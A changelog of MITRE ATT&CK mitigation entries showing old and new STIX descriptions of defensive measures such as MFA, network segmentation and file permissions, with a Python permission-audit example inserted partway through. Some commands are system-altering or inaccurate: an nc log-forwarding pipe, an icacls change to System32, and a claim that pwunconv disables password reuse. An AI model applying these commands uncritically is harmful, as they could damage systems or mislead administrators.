`ExploitProtectionExportSettings.exe -path "exploit_settings.xml"`
Linux: Use kernel-level hardening features like SELinux, AppArmor, or GRSEC to enforce memory protections and prevent exploits.
Third-Party Endpoint Security:
- Use Case: Use endpoint protection tools with built-in exploit protection, such as enhanced memory protection, behavior monitoring, and real-time exploit detection.
- Implementation: Deploy tools to detect and block exploitation attempts targeting unpatched software.
Virtual Patching:
- Use Case: Use tools to implement virtual patches that mitigate vulnerabilities in applications or operating systems until official patches are applied.
- Implementation: Use Intrusion Prevention System (IPS) to block exploitation attempts on known vulnerabilities in outdated applications.
Hardening Application Configurations:
- Use Case: Disable risky application features that can be exploited, such as macros in Microsoft Office or JScript in Internet Explorer.
- Implementation: Configure Microsoft Office Group Policies to disable execution of macros in downloaded files. |
x_mitre_version | 1.1 | 1.2 |
[M1037] Filter Network Traffic
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 18:54:05.785000+00:00 | 2024-12-11 19:43:03.354000+00:00 |
description | Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. | Employ network appliances and endpoint software to filter ingress, egress, and lateral network traffic. This includes protocol-based filtering, enforcing firewall rules, and blocking or restricting traffic based on predefined conditions to limit adversary movement and data exfiltration. This mitigation can be implemented through the following measures:
Ingress Traffic Filtering:
- Use Case: Configure network firewalls to allow traffic only from authorized IP addresses to public-facing servers.
- Implementation: Limit SSH (port 22) and RDP (port 3389) traffic to specific IP ranges.
Egress Traffic Filtering:
- Use Case: Use firewalls or endpoint security software to block unauthorized outbound traffic to prevent data exfiltration and command-and-control (C2) communications.
- Implementation: Block outbound traffic to known malicious IPs or regions where communication is unexpected.
Protocol-Based Filtering:
- Use Case: Restrict the use of specific protocols that are commonly abused by adversaries, such as SMB, RPC, or Telnet, based on business needs.
- Implementation: Disable SMBv1 on endpoints to prevent exploits like EternalBlue.
Network Segmentation:
- Use Case: Create network segments for critical systems and restrict communication between segments unless explicitly authorized.
- Implementation: Implement VLANs to isolate IoT devices or guest networks from core business systems.
Application Layer Filtering:
- Use Case: Use proxy servers or Web Application Firewalls (WAFs) to inspect and block malicious HTTP/S traffic.
- Implementation: Configure a WAF to block SQL injection attempts or other web application exploitation techniques. |
x_mitre_version | 1.1 | 1.2 |
[M1035] Limit Access to Resource Over Network
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-09 20:51:00.027000+00:00 | 2024-12-18 15:50:51.212000+00:00 |
description | Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc. | Restrict access to network resources, such as file shares, remote systems, and services, to only those users, accounts, or systems with a legitimate business requirement. This can include employing technologies like network concentrators, RDP gateways, and zero-trust network access (ZTNA) models, alongside hardening services and protocols. This mitigation can be implemented through the following measures:
Audit and Restrict Access:
- Regularly audit permissions for file shares, network services, and remote access tools.
- Remove unnecessary access and enforce least privilege principles for users and services.
- Use Active Directory and IAM tools to restrict access based on roles and attributes.
Deploy Secure Remote Access Solutions:
- Use RDP gateways, VPN concentrators, and ZTNA solutions to aggregate and secure remote access connections.
- Configure access controls to restrict connections based on time, device, and user identity.
- Enforce MFA for all remote access mechanisms.
Disable Unnecessary Services:
- Identify running services using tools like netstat (Windows/Linux) or Nmap.
- Disable unused services, such as Telnet, FTP, and legacy SMB, to reduce the attack surface.
- Use firewall rules to block traffic on unused ports and protocols.
Network Segmentation and Isolation:
- Use VLANs, firewalls, or micro-segmentation to isolate critical network resources from general access.
- Restrict communication between subnets to prevent lateral movement.
Monitor and Log Access:
- Monitor access attempts to file shares, RDP, and remote network resources using SIEM tools.
- Enable auditing and logging for successful and failed attempts to access restricted resources.
*Tools for Implementation*
File Share Management:
- Microsoft Active Directory Group Policies
- Samba (Linux/Unix file share management)
- AccessEnum (Windows access auditing tool)
Secure Remote Access:
- Microsoft Remote Desktop Gateway
- Apache Guacamole (open-source RDP/VNC gateway)
- Zero Trust solutions: Tailscale, Cloudflare Zero Trust
Service and Protocol Hardening:
- Nmap or Nessus for network service discovery
- Windows Group Policy Editor for disabling SMBv1, Telnet, and legacy protocols
- iptables or firewalld (Linux) for blocking unnecessary traffic
Network Segmentation:
- pfSense for open-source network isolation |
x_mitre_version | 1.0 | 1.1 |
[M1034] Limit Hardware Installation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-06-09 20:48:12.326000+00:00 | 2024-12-18 16:09:24.873000+00:00 |
description | Block users or groups from installing or using unapproved hardware on systems, including USB devices. | Prevent unauthorized users or groups from installing or using hardware, such as external drives, peripheral devices, or unapproved internal hardware components, by enforcing hardware usage policies and technical controls. This includes disabling USB ports, restricting driver installation, and implementing endpoint security tools to monitor and block unapproved devices. This mitigation can be implemented through the following measures:
Disable USB Ports and Hardware Installation Policies:
- Use Group Policy Objects (GPO) to disable USB mass storage devices:
- Navigate to Computer Configuration > Administrative Templates > System > Removable Storage Access.
- Deny write and read access to USB devices.
- Whitelist approved devices using unique serial numbers via Windows Device Installation Policies.
Deploy Endpoint Protection and Device Control Solutions:
- Use tools like Microsoft Defender for Endpoint, Symantec Endpoint Protection, or Tanium to monitor and block unauthorized hardware.
- Implement device control policies to allow specific hardware types (e.g., keyboards, mice) and block others.
Harden BIOS/UEFI and System Firmware:
- Set strong passwords for BIOS/UEFI access.
- Enable Secure Boot to prevent rogue hardware components from loading unauthorized firmware.
Restrict Peripheral Devices and Drivers:
- Use Windows Device Manager Policies to block installation of unapproved drivers.
- Monitor hardware installation attempts through endpoint monitoring tools.
Disable Bluetooth and Wireless Hardware:
- Use GPO or MDM tools to disable Bluetooth and Wi-Fi interfaces across systems.
- Restrict hardware pairing to approved devices only.
Logging and Monitoring:
- Enable logging for hardware installation events in Windows Event Logs (Event ID 20001 for Device Setup Manager).
- Use SIEM solutions (e.g., Splunk, Elastic Stack) to detect unauthorized hardware installation activities.
*Tools for Implementation*
USB and Device Control:
- Microsoft Group Policy Objects (GPO)
- Microsoft Defender for Endpoint
- Symantec Endpoint Protection
- McAfee Device Control
Endpoint Monitoring:
- EDRs
- OSSEC (open-source host-based IDS)
Hardware Whitelisting:
- BitLocker for external drives (Windows)
- Windows Device Installation Policies
- Device Control
BIOS/UEFI Security:
- Secure Boot (Windows/Linux)
- Firmware management tools like Dell Command Update or HP Sure Start |
x_mitre_version | 1.0 | 1.1 |
[M1033] Limit Software Installation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 18:54:20.898000+00:00 | 2024-12-18 16:17:46.153000+00:00 |
description | Block users or groups from installing unapproved software. | Prevent users or groups from installing unauthorized or unapproved software to reduce the risk of introducing malicious or vulnerable applications. This can be achieved through allowlists, software restriction policies, endpoint management tools, and least privilege access principles. This mitigation can be implemented through the following measures:
Application Whitelisting
- Implement Microsoft AppLocker or Windows Defender Application Control (WDAC) to create and enforce allowlists for approved software.
- Whitelist applications based on file hash, path, or digital signatures.
Restrict User Permissions
- Remove local administrator rights for all non-IT users.
- Use Role-Based Access Control (RBAC) to restrict installation permissions to privileged accounts only.
Software Restriction Policies (SRP)
- Use GPO to configure SRP to deny execution of binaries from directories such as `%AppData%`, `%Temp%`, and external drives.
- Restrict specific file types (`.exe`, `.bat`, `.msi`, `.js`, `.vbs`) to trusted directories only.
Endpoint Management Solutions
- Deploy tools like Microsoft Intune, SCCM, or Jamf for centralized software management.
- Maintain a list of approved software, versions, and updates across the enterprise.
Monitor Software Installation Events
- Enable logging of software installation events and monitor Windows Event ID 4688 and Event ID 11707 for software installs.
- Use SIEM or EDR tools to alert on attempts to install unapproved software.
Implement Software Inventory Management
- Use tools like OSQuery or Wazuh to scan for unauthorized software on endpoints and servers.
- Conduct regular audits to detect and remove unapproved software.
*Tools for Implementation*
Application Whitelisting:
- Microsoft AppLocker
- Windows Defender Application Control (WDAC)
Endpoint Management:
- Microsoft Intune
- SCCM (System Center Configuration Manager)
- Jamf Pro (macOS)
- Puppet or Ansible for automation
Software Restriction Policies:
- Group Policy Object (GPO)
- Microsoft Software Restriction Policies (SRP)
Monitoring and Logging:
- Splunk
- OSQuery
- Wazuh (open-source SIEM and XDR)
- EDRs
Inventory Management and Auditing:
- OSQuery
- Wazuh |
x_mitre_version | 1.0 | 1.1 |
[M1032] Multi-factor Authentication
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21 15:52:06.295000+00:00 | 2025-04-02 17:29:15.914000+00:00 |
description | Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. | Multi-Factor Authentication (MFA) enhances security by requiring users to provide at least two forms of verification to prove their identity before granting access. These factors typically include:
- *Something you know*: Passwords, PINs.
- *Something you have*: Physical tokens, smartphone authenticator apps.
- *Something you are*: Biometric data such as fingerprints, facial recognition, or retinal scans.
Implementing MFA across all critical systems and services ensures robust protection against account takeover and unauthorized access. This mitigation can be implemented through the following measures:
Identity and Access Management (IAM):
- Use IAM solutions like Azure Active Directory, Okta, or AWS IAM to enforce MFA policies for all user logins, especially for privileged roles.
- Enable conditional access policies to enforce MFA for risky sign-ins (e.g., unfamiliar devices, geolocations).
Authentication Tools and Methods:
- Use authenticator applications such as Google Authenticator, Microsoft Authenticator, or Authy for time-based one-time passwords (TOTP).
- Deploy hardware-based tokens like YubiKey, RSA SecurID, or smart cards for additional security.
- Enforce biometric authentication for compatible devices and applications.
Secure Legacy Systems:
- Integrate MFA solutions with older systems using third-party tools like Duo Security or Thales SafeNet.
- Enable RADIUS/NPS servers to facilitate MFA for VPNs, RDP, and other network logins.
Monitoring and Alerting:
- Use SIEM tools to monitor failed MFA attempts, login anomalies, or brute-force attempts against MFA systems.
- Implement alerts for suspicious MFA activities, such as repeated failed codes or new device registrations.
Training and Policy Enforcement:
- Educate employees on the importance of MFA and secure authenticator usage.
- Enforce policies that require MFA on all critical systems, especially for remote access, privileged accounts, and cloud applications. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[M1030] Network Segmentation
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-14 13:05:39.500000+00:00 | 2025-04-02 17:29:32.003000+00:00 |
description | Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems. | Network segmentation involves dividing a network into smaller, isolated segments to control and limit the flow of traffic between devices, systems, and applications. By segmenting networks, organizations can reduce the attack surface, restrict lateral movement by adversaries, and protect critical assets from compromise.
Effective network segmentation leverages a combination of physical boundaries, logical separation through VLANs, and access control policies enforced by network appliances like firewalls, routers, and cloud-based configurations. This mitigation can be implemented through the following measures:
Segment Critical Systems:
- Identify and group systems based on their function, sensitivity, and risk. Examples include payment systems, HR databases, production systems, and internet-facing servers.
- Use VLANs, firewalls, or routers to enforce logical separation.
Implement DMZ for Public-Facing Services:
- Host web servers, DNS servers, and email servers in a DMZ to limit their access to internal systems.
- Apply strict firewall rules to filter traffic between the DMZ and internal networks.
Use Cloud-Based Segmentation:
- In cloud environments, use VPCs, subnets, and security groups to isolate applications and enforce traffic rules.
- Apply AWS Transit Gateway or Azure VNet peering for controlled connectivity between cloud segments.
Apply Microsegmentation for Workloads:
- Use software-defined networking (SDN) tools to implement workload-level segmentation and prevent lateral movement.
Restrict Traffic with ACLs and Firewalls:
- Apply Access Control Lists (ACLs) to network devices to enforce "deny by default" policies.
- Use firewalls to restrict both north-south (external-internal) and east-west (internal-internal) traffic.
Monitor and Audit Segmented Networks:
- Regularly review firewall rules, ACLs, and segmentation policies.
- Monitor network flows for anomalies to ensure segmentation is effective.
Test Segmentation Effectiveness:
- Perform periodic penetration tests to verify that unauthorized access is blocked between network segments. |
x_mitre_version | 1.1 | 1.2 |
[M1028] Operating System Configuration
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-31 17:27:28.395000+00:00 | 2024-12-18 18:04:26.025000+00:00 |
description | Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques. | Operating System Configuration involves adjusting system settings and hardening the default configurations of an operating system (OS) to mitigate adversary exploitation and prevent abuse of system functionality. Proper OS configurations address security vulnerabilities, limit attack surfaces, and ensure robust defense against a wide range of techniques. This mitigation can be implemented through the following measures:
Disable Unused Features:
- Turn off SMBv1, LLMNR, and NetBIOS where not needed.
- Disable remote registry and unnecessary services.
Enforce OS-level Protections:
- Enable Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG) on Windows.
- Use AppArmor or SELinux on Linux for mandatory access controls.
Secure Access Settings:
- Enable User Account Control (UAC) for Windows.
- Restrict root/sudo access on Linux/macOS and enforce strong permissions using sudoers files.
File System Hardening:
- Implement least-privilege access for critical files and system directories.
- Audit permissions regularly using tools like icacls (Windows) or getfacl/chmod (Linux/macOS).
Secure Remote Access:
- Restrict RDP, SSH, and VNC to authorized IPs using firewall rules.
- Enable NLA for RDP and enforce strong password/lockout policies.
Harden Boot Configurations:
- Enable Secure Boot and enforce UEFI/BIOS password protection.
- Use BitLocker or LUKS to encrypt boot drives.
Regular Audits:
- Periodically audit OS configurations using tools like CIS Benchmarks or SCAP tools.
*Tools for Implementation*
Windows:
- Microsoft Group Policy Objects (GPO): Centrally enforce OS security settings.
- Windows Defender Exploit Guard: Built-in OS protection against exploits.
- CIS-CAT Pro: Audit Windows security configurations based on CIS Benchmarks.
Linux/macOS:
- AppArmor/SELinux: Enforce mandatory access controls.
- Lynis: Perform comprehensive security audits.
- SCAP Security Guide: Automate configuration hardening using Security Content Automation Protocol.
Cross-Platform:
- Ansible or Chef/Puppet: Automate configuration hardening at scale.
- OpenSCAP: Perform compliance and configuration checks. |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[M1027] Password Policies
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-10-21 15:52:23.327000+00:00 | 2024-12-18 18:08:17.479000+00:00 |
description | Set and enforce secure password policies for accounts. | Set and enforce secure password policies for accounts to reduce the likelihood of unauthorized access. Strong password policies include enforcing password complexity, requiring regular password changes, and preventing password reuse. This mitigation can be implemented through the following measures:
Windows Systems:
- Use Group Policy Management Console (GPMC) to configure:
- Minimum password length (e.g., 12+ characters).
- Password complexity requirements.
- Password history (e.g., disallow last 24 passwords).
- Account lockout duration and thresholds.
Linux Systems:
- Configure Pluggable Authentication Modules (PAM):
- Use `pam_pwquality` to enforce complexity and length requirements.
- Implement `pam_tally2` or `pam_faillock` for account lockouts.
- Use `pwunconv` to disable password reuse.
Password Managers:
- Enforce usage of enterprise password managers (e.g., Bitwarden, 1Password, LastPass) to generate and store strong passwords.
Password Blacklisting:
- Use tools like Have I Been Pwned password checks or NIST-based blacklist solutions to prevent users from setting compromised passwords.
Regular Auditing:
- Periodically audit password policies and account configurations to ensure compliance using tools like LAPS (Local Admin Password Solution) and vulnerability scanners.
*Tools for Implementation*
Windows:
- Group Policy Management Console (GPMC): Enforce password policies.
- Microsoft Local Administrator Password Solution (LAPS): Enforce random, unique admin passwords.
Linux/macOS:
- PAM Modules (pam_pwquality, pam_tally2, pam_faillock): Enforce password rules.
- Lynis: Audit password policies and system configurations.
Cross-Platform:
- Password Managers (Bitwarden, 1Password, KeePass): Manage and enforce strong passwords.
- Have I Been Pwned API: Prevent the use of breached passwords.
- NIST SP 800-63B compliant tools: Enforce password guidelines and blacklisting. |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[M1056] Pre-compromise
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-10-20 19:52:32.439000+00:00 | 2024-12-18 18:24:37.835000+00:00 |
description | This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques. | Pre-compromise mitigations involve proactive measures and defenses implemented to prevent adversaries from successfully identifying and exploiting weaknesses during the Reconnaissance and Resource Development phases of an attack. These activities focus on reducing an organization's attack surface, identify adversarial preparation efforts, and increase the difficulty for attackers to conduct successful operations. This mitigation can be implemented through the following measures:
Limit Information Exposure:
- Regularly audit and sanitize publicly available data, including job posts, websites, and social media.
- Use tools like OSINT monitoring platforms (e.g., SpiderFoot, Recon-ng) to identify leaked information.
Protect Domain and DNS Infrastructure:
- Enable DNSSEC and use WHOIS privacy protection.
- Monitor for domain hijacking or lookalike domains using services like RiskIQ or DomainTools.
External Monitoring:
- Use tools like Shodan, Censys to monitor your external attack surface.
- Deploy external vulnerability scanners to proactively address weaknesses.
Threat Intelligence:
- Leverage platforms like MISP, Recorded Future, or Anomali to track adversarial infrastructure, tools, and activity.
Content and Email Protections:
- Use email security solutions like Proofpoint, Microsoft Defender for Office 365, or Mimecast.
- Enforce SPF/DKIM/DMARC policies to protect against email spoofing.
Training and Awareness:
- Educate employees on identifying phishing attempts, securing their social media, and avoiding information leaks. |
x_mitre_version | 1.0 | 1.1 |
[M1026] Privileged Account Management
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 18:55:04.576000+00:00 | 2024-12-18 18:44:23.306000+00:00 |
description | Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root. | Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing. This mitigation can be implemented through the following measures:
Account Permissions and Roles:
- Implement RBAC and least privilege principles to allocate permissions securely.
- Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security:
- Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
- Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA):
- Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM):
- Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring:
- Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access:
- Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
*Tools for Implementation*
Privileged Access Management (PAM):
- CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management:
- Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication:
- Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management:
- sudo configuration, SELinux, AppArmor.
Just-In-Time Access:
- Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy. |
x_mitre_version | 1.1 | 1.2 |
[M1025] Privileged Process Integrity
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-20 13:13:48.900000+00:00 | 2024-12-18 18:51:02.792000+00:00 |
description | Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures. | Privileged Process Integrity focuses on defending highly privileged processes (e.g., system services, antivirus, or authentication processes) from tampering, injection, or compromise by adversaries. These processes often interact with critical components, making them prime targets for techniques like code injection, privilege escalation, and process manipulation. This mitigation can be implemented through the following measures:
Protected Process Mechanisms:
- Enable RunAsPPL on Windows systems to protect LSASS and other critical processes.
- Use registry modifications to enforce protected process settings: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL`
Anti-Injection and Memory Protection:
- Enable Control Flow Guard (CFG), DEP, and ASLR to protect against process memory tampering.
- Deploy endpoint protection tools that actively block process injection attempts.
Code Signing Validation:
- Implement policies for Windows Defender Application Control (WDAC) or AppLocker to enforce execution of signed binaries.
- Ensure critical processes are signed with valid certificates.
Access Controls:
- Use DACLs and MIC to limit which users and processes can interact with privileged processes.
- Disable unnecessary debugging capabilities for high-privileged processes.
Kernel-Level Protections:
- Ensure Kernel Patch Protection (PatchGuard) is enabled on Windows systems.
- Leverage SELinux or AppArmor on Linux to enforce kernel-level security policies.
*Tools for Implementation*
Protected Process Light (PPL):
- RunAsPPL (Windows)
- Windows Defender Credential Guard
Code Integrity and Signing:
- Windows Defender Application Control (WDAC)
- AppLocker
- SELinux/AppArmor (Linux)
Memory Protection:
- Control Flow Guard (CFG), Data Execution Prevention (DEP), ASLR
Process Isolation/Sandboxing:
- Firejail (Linux Sandbox)
- Windows Sandbox
- QEMU/KVM-based isolation
Kernel Protection:
- PatchGuard (Windows Kernel Patch Protection)
- SELinux (Mandatory Access Control for Linux)
- AppArmor |
x_mitre_version | 1.1 | 1.2 |
[M1029] Remote Data Storage
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-06-06 21:21:13.027000+00:00 | 2024-12-18 19:03:10.800000+00:00 |
description | Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information. | Remote Data Storage focuses on moving critical data, such as security logs and sensitive files, to secure, off-host locations to minimize unauthorized access, tampering, or destruction by adversaries. By leveraging remote storage solutions, organizations enhance the protection of forensic evidence, sensitive information, and monitoring data. This mitigation can be implemented through the following measures:
Centralized Log Management:
- Configure endpoints to forward security logs to a centralized log collector or SIEM.
- Use tools like Splunk, Graylog, or Security Onion to aggregate and store logs.
- Example command (Linux): `sudo auditd | tee /var/log/audit/audit.log | nc <remote-log-server> 514`
Remote File Storage Solutions:
- Utilize cloud storage solutions like AWS S3, Google Cloud Storage, or Azure Blob Storage for sensitive data.
- Ensure proper encryption at rest and access control policies (IAM roles, ACLs).
Intrusion Detection Log Forwarding:
- Forward logs from IDS/IPS systems (e.g., Zeek/Suricata) to a remote security information system.
- Example for Suricata log forwarding:
```yaml
outputs:
  - type: syslog
    protocol: tls
    address: <remote-syslog-server>
```
Immutable Backup Configurations:
- Enable immutable storage settings for backups to prevent adversaries from modifying or deleting data.
- Example: AWS S3 Object Lock.
Data Encryption:
- Ensure encryption for sensitive data using AES-256 at rest and TLS 1.2+ for data in transit.
Tools: OpenSSL, BitLocker, LUKS for Linux. |
x_mitre_version | 1.0 | 1.1 |
[M1022] Restrict File and Directory Permissions
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-20 15:12:39.136000+00:00 | 2024-12-18 19:18:58.856000+00:00 |
description | Restrict access by setting directory and file permissions that are not specific to users or privileged accounts. | Restricting file and directory permissions involves setting access controls at the file system level to limit which users, groups, or processes can read, write, or execute files. By configuring permissions appropriately, organizations can reduce the attack surface for adversaries seeking to access sensitive data, plant malicious code, or tamper with system files.
Enforce Least Privilege Permissions:
- Remove unnecessary write permissions on sensitive files and directories.
- Use file ownership and groups to control access for specific roles.
Example (Windows): Right-click the shared folder → Properties → Security tab → Adjust permissions for NTFS ACLs.
Harden File Shares:
- Disable anonymous access to shared folders.
- Enforce NTFS permissions for shared folders on Windows.
Example: Set permissions to restrict write access to critical files, such as system executables (e.g., `/bin` or `/sbin` on Linux). Use tools like `chown` and `chmod` to assign file ownership and limit access.
On Linux, apply:
`chmod 750 /etc/sensitive.conf`
`chown root:admin /etc/sensitive.conf`
File Integrity Monitoring (FIM):
- Use tools like Tripwire, Wazuh, or OSSEC to monitor changes to critical file permissions.
Audit File System Access:
- Enable auditing to track permission changes or unauthorized access attempts.
- Use auditd (Linux) or Event Viewer (Windows) to log activities.
Restrict Startup Directories:
- Configure permissions to prevent unauthorized writes to directories like `C:\ProgramData\Microsoft\Windows\Start Menu`.
Example: Restrict write access to critical directories like `/etc/`, `/usr/local/`, and Windows directories such as `C:\Windows\System32`.
- On Windows, use icacls to modify permissions: `icacls "C:\Windows\System32" /inheritance:r /grant:r SYSTEM:(OI)(CI)F`
- On Linux, monitor permissions using tools like `lsattr` or `auditd`. |
x_mitre_version | 1.1 | 1.2 |
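As an added illustration of the least-privilege and `chmod 750` guidance in the new M1022 description (example code, not part of the ATT&CK text): a small POSIX permission audit that walks a directory tree, flags group- or world-writable entries and unexpected owners, then shows the audit going clean after remediation. The sample tree is constructed in a temporary directory, and the `Finding`, `audit_tree` and `demo` names are the example's own.

```python
"""Audit a directory tree for weak file permissions, then show remediation.

Added example in the spirit of the least-privilege guidance above
(constructed sample tree; POSIX mode bits, so this runs on Linux/macOS).
"""
from __future__ import annotations

import os
import stat
import tempfile
from dataclasses import dataclass
from pathlib import Path


@dataclass(frozen=True)
class Finding:
    path: str
    mode: str                 # permission bits as octal text, e.g. "0666"
    reasons: tuple[str, ...]  # why this entry violates the policy


def check_entry(st: os.stat_result, expected_uid: int,
                allow_group_write: bool = False) -> tuple[str, ...]:
    """Return the policy violations for one lstat() result (empty if clean)."""
    mode = st.st_mode
    reasons: list[str] = []
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
        # A world-writable directory without the sticky bit lets any user
        # delete or replace other users' files in it (unlike /tmp).
        if stat.S_ISDIR(mode) and not mode & stat.S_ISVTX:
            reasons.append("world-writable directory without sticky bit")
    if mode & stat.S_IWGRP and not allow_group_write:
        reasons.append("group-writable")
    if st.st_uid != expected_uid:
        reasons.append(f"owner uid {st.st_uid} != expected {expected_uid}")
    if not stat.S_ISDIR(mode) and mode & (stat.S_ISUID | stat.S_ISGID):
        reasons.append("setuid/setgid bit set")
    return tuple(reasons)


def audit_tree(root: str, expected_uid: int = 0,
               allow_group_write: bool = False) -> list[Finding]:
    """Walk `root` (root itself included) and collect every policy violation."""
    root_path = Path(root)
    findings: list[Finding] = []
    for path in [root_path, *root_path.rglob("*")]:
        st = path.lstat()
        if stat.S_ISLNK(st.st_mode):
            continue  # a symlink's own mode bits mean nothing; its target is audited in place
        reasons = check_entry(st, expected_uid, allow_group_write)
        if reasons:
            findings.append(Finding(str(path), format(stat.S_IMODE(st.st_mode), "04o"), reasons))
    return findings


def demo() -> dict[str, dict[str, tuple[str, ...]]]:
    """Build a constructed tree, audit it, apply `chmod 750`, and re-audit."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "sensitive.conf").write_text("secret=1\n")
        os.chmod(base / "sensitive.conf", 0o750)   # already follows the chmod 750 guidance
        (base / "world.conf").write_text("port=80\n")
        os.chmod(base / "world.conf", 0o666)       # weak: any local user can tamper with it
        (base / "bin").mkdir()
        os.chmod(base / "bin", 0o777)              # weak: any local user can plant a binary
        # The example cannot chown to root, so it audits against the current owner.
        uid = os.getuid()
        before = {Path(f.path).name: f.reasons for f in audit_tree(tmp, expected_uid=uid)}
        for name in ("world.conf", "bin"):         # remediate as the guidance suggests
            os.chmod(base / name, 0o750)
        after = {Path(f.path).name: f.reasons for f in audit_tree(tmp, expected_uid=uid)}
        return {"before": before, "after": after}


if __name__ == "__main__":
    for phase, found in demo().items():
        print(f"{phase}: {found or 'no findings'}")
```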
[M1044] Restrict Library Loading
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-06-11 17:00:01.740000+00:00 | 2024-12-18 20:22:48.602000+00:00 |
description | Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software. | Restricting library loading involves implementing security controls to ensure that only trusted and verified libraries (DLLs, shared objects, etc.) are loaded into processes. Adversaries often abuse Dynamic-Link Library (DLL) Injection, DLL Search Order Hijacking, or LD_PRELOAD mechanisms to execute malicious code by forcing the operating system to load untrusted libraries. This mitigation can be implemented through the following measures:
Enforce Safe Library Loading Practices:
- Enable `SafeDLLSearchMode` on Windows.
- Restrict `LD_PRELOAD` and `LD_LIBRARY_PATH` usage on Linux systems.
Code Signing Enforcement:
- Require digital signatures for all libraries loaded into processes.
- Use tools like Signtool and WDAC to enforce signed DLL execution.
Environment Hardening:
- Secure library paths and directories to prevent adversaries from placing rogue libraries.
